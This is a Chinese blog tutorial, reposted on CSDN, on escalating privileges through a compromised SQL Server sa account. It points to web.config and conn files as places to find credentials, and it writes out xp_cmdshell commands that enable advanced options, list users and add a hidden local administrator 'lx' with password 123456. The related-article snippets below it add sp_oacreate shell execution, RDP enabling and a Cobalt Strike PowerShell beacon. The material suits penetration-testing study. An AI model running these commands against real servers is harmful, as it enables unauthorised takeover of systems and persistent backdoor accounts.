sqlserver提权失败_[原创]WEB安全第六章提权篇09 sqlserver提权

最新推荐文章于 2023-05-24 13:55:54 发布
最新推荐文章于 2023-05-24 13:55:54 发布
阅读量108 收藏
点赞数
文章标签: sqlserver提权失败
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36382907/article/details/111925312
版权

WEB安全第六章提权篇09 sqlserver提权

1、简介

如果网站里面使用的数据库是sqlserver 那么如果找到sa的密码,利用提权脚本,执行命令,但是不一定的系统权限,还要看管理员开始安装sqlserver的权限设置。

2、查找帐号和密码

web.config

config.asp

conn.aspx

database.aspx

3、开启xp_cmdshell

Exec master.dbo.xp_cmdshell ‘net user’

Exec sp_configure ‘show advanced options’,1;RECONFIGURE;exec sp_configure ‘Ad Hoc Distributed Queries’,1;RECONFIGURE;

Exec master.dbo.xp_cmdshell ‘net user lx 123456 /add & net localgroup administrators lx /add’

Exec master.dbo.xp_cmdshell ‘systeminfo’

4、实战

http://www.demo1.com/asp.aspx

密码 123456

链接mssql

在sql2005以后

查看当前权限

查看当前权限也是一个普通用户。可以执行一些基础的命令,可以上传溢出提权工具 再来提高当前用户的权限。

有些时候  是一个系统权限  主要还是要看目标管理员在开始安装sqlserver的时候给的是什么样的权限。

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/archives/431

红果研教育
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL Server提权系列
2301_77152761的博客
05-11 365
CLR 为托管代码提供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。编写存储过程、触发器、用户定义类型、用户定义函数(标量函数和表值函数)以及用户定义的聚合函数。3、设置项目属性,目标平台修改为需要的目标平台,如SQL Server 2012;4、右键项目,选择添加->新建项,新建SQL CLR C# 存储过程。7、双击此文件进行解压,将解压出一个名为mode.sql的文件。2、SQL Server当前账号具有执行命令/代码所需要的权限。8、执行SQL文件中的以下语句。
SQLserver提权
最新发布
m0_62207482的博客
03-23 380
xp_cmdshell是Sql Server中的一个组件,可以用来执行系统命令,在拿到sa口令之后,经常可以通过xp_cmdshell来进行提权。修改开启Ageent Job,执行无回显CobaltStrike生成powershell上线。在xp_cmdshell被删除或者出错情况下,可以充分利用SP_OACreate进行提权,需要同时具备sp_oacreate和sp_oamethod两个功能组件。# 通过xp_cmdshell执行系统命令。xp_cmdshell提权。启用xp_cmdshell。
sqlserver提权
YouthBelief的博客
12-19 1645
1.xp_cmdshell提权 默认在sqlserver2000中开启,2005后默认禁止,使用sp_configure重新打开它 sa权限下 使用xp_cmdshell可以 以system权限执行操作系统命令。 开启xp_cmdshell exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell',1; reconfigure; 关闭xp_cmdshell exec sp_confi
Dome-ASP.NET CORE 6 webapi 使用 EF DBFirst 配合 sql server
05-26
综上所述,"Dome-ASP.NET CORE 6 webapi 使用 EF DBFirst 配合 sql server"是一个基于最新.NET Core版本的Web服务开发实例,它利用了EF的DBFirst策略,使得开发人员能够快速地构建与SQL Server数据库交互的API服务。
SQL SERVER 数据库应用技术第02章 SQL Server 2005系统概述.ppt
06-03
本章主要介绍了SQL Server 2005的基本信息、特性、新功能以及安装和主要组件的应用。 首先,SQL Server 2005的系统简介包括它的历史发展。自1988年起,SQL Server经历了多个版本的迭代,从最初的与Sybase合作到后来...
JSP(SQLserver).rar_jsp_jsp SqLserv_jsp+sql_jsp购物车_网上购物
09-19
【标题】"JSP(SQLserver).rar"是一个与JSP技术结合SQL Server数据库实现的网上购物车系统的资源压缩包。这个系统充分利用了JSP(JavaServer Pages)的强大功能,配合SQL Server作为后端数据存储,为用户提供了一种...
1第八章SQLServer数据库系统概述.ppt
06-02
SQL Server是Microsoft公司推出的关系型数据库管理系统,以其强大的数据存储和处理能力被广泛应用于各种规模的企业和组织。自1988年首次发布以来,SQL Server经历了多个版本的迭代,不断优化性能,增加新功能,以...
解决WinServer2012操作系统安装 SQLServer2008R2失败,需要打sxs补丁
08-15
在Windows Server 2012操作系统中安装SQL Server 2008 R2时,可能会遇到一些问题,导致安装过程失败。这个问题通常与系统组件的缺失有关,特别是针对.NET Framework 3.5的支持。本文将深入探讨如何解决这个问题,...
070-浅谈SQL Server从DBO用户提权到DBA的两种思路.pdf
09-20
070-浅谈SQL Server从DBO用户提权到DBA的两种思路.pdf
mssql数据库提权之——xp_cmdshell执行系统命令
01-19
条件 所谓利用数据进行提权,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行提权: 1、 必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。 2、 必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。 提权基本思路过程与原理 1.MSSQL在Windows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比管理员小;而在2003以上的版本,则为最高权限。 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使
1433修复提权资料
05-26
1433修复提权资料 提权 无视 牛逼 最新解封
SQlserver提权方法
good good study
05-24 2185
sql server提权(执行命令)主要依赖于sql server自带的存储过程。目的:sqlserver权限 —> 系统权限存储过程是一个可编程的函数,它在数据库中创建并保存,是存储在服务器中的一组预编译过的T-SQL语句。数据库中的存储过程可以看做是对编程中面向对象方法的模拟。它允许控制数据的访问方式(可以将存储过程理解为函数调用的过程),使用execute命令执行存储过程。主要分为系统存储过程、扩展存储过程、用户自定义的存储过程三大类。
第三方组件提权-SQL server提权
Love&Share
11-20 2586
文章目录基础MSSQL权限级别拿webshellxp_cmdshell执行系统命令LOG备份getshell提权使用xp_cmdshell进行提权以下内容为转载使用sp_oacreate进行提权|无回显sp_oacreate简介sp_oacreate使用沙盒提权SQL Server 沙盒简介JOB提权使用xp_regwrite提权 | 映像劫持提权其他骚操作使用sp_makewebtask写文件总结二级内网MSSQL渗透|上线CS 基础 MSSQL(MicroSoft SQL Server数据库),是微软.
sqlserver提权失败_sqlserver提权方法
weixin_39938312的博客
12-23 150
'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net...
渗透综合靶场---SqlServer提权
q
12-22 1081
再次查询是否开启3389端口,已开启就使用mstsc连接----exec xp_cmdshell'netstat -ant | find "3389"'查看目标是否开启3389端口----exec xp_cmdshell'netstat -ant | find "3389"'如何找到上传的文件所在目录,使用burp抓包点击文件,然后修改文件名,然后再放包,浏览器因为找不到文件会报错。扫描端口,知道目标ip,扫描目标ip开启了多少端口,(1-65535) 扫描出下面端口。
sqlserver提权失败_MsSQL数据库提权
weixin_35902800的博客
12-23 193
MsSQL数据库提权注:这是基于相关CISP-PTE的学习笔记总结的博客文章1.通过xp_cmdshell提权数据库:SQLServer2005新建查询,执行以下权限,exec为执行(execute)的简写,设置show advanced options为1时(默认为0),可使用sp_configure允许列出高级选项允许调用命令查询权限,已经是管理员权限添加用户youki,密码为youki使用c...
Windows提权技术详解
本章提供了多个具体的提权案例,涵盖了各种环境和情况,如Web服务器的防护软件绕过、远程桌面服务的提权、数据库服务的利用等,展示了实战中如何实施提权。 每个案例都详细讲解了攻击者如何利用系统漏洞、配置错误...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值